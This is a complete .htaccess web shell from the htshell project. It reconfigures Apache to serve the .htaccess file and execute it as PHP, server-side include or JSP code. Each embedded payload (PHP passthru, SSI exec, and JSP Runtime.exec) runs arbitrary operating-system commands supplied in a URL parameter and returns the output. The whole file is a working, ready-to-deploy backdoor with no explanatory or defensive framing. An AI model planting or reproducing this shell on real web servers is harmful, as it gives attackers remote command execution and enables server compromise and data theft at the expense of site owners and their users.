# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
    Order allow,deny
    Allow from all
</Files>

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted 
# the apache directoves from the .htaccess file
<IfModule mod_php5.c>
    AddType application/x-httpd-php .htaccess
</IfModule>
<IfModule mod_php4.c>
    AddType application/x-httpd-php .htaccess
</IfModule>
<IfModule mod_php3.c>
    AddType application/x-httpd-php .htaccess
</IfModule>
<IfModule mod_php6.c>
    AddType application/x-httpd-php .htaccess
</IfModule>

###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######

<IfModule mod_include.c>
# Enable serverside includes with exec functionality
    Options +Includes

#Make apache treat .htaccess as a server side include file
    AddHandler text/html .htaccess
    AddOutputFilter INCLUDES .htaccess
</IfModule>
#SHELL<!--#exec cmd="echo ''" --><!--#if expr="$QUERY_STRING_UNESCAPED = /^c=(.*)$/" --><!--#set var="cmd" value="$1 2>&1" --><!--#else --><!--#set var="cmd" value="echo 'Regex failed'" --><!--#endif --><!--#exec cmd="$cmd"-->LLEHS
<IfModule mod_cacuho.c>
    AddHandler caucho-request .htaccess
</IfModule>
###### SHELL ######<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2"><jsp:directive.page import="java.io.*"/><jsp:scriptlet>String cmd = request.getParameter("cmd");String output = "";Process p = null;String s = null;try {if (System.getProperty("os.name").toUpperCase().indexOf("WINDOWS") != -1){p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);}else{p = Runtime.getRuntime().exec( cmd );}BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));while((s = sI.readLine()) != null) {out.println( s );}}catch(IOException e) {out.println( e );}}</jsp:scriptlet></jsp:root>###### LLEHS ######

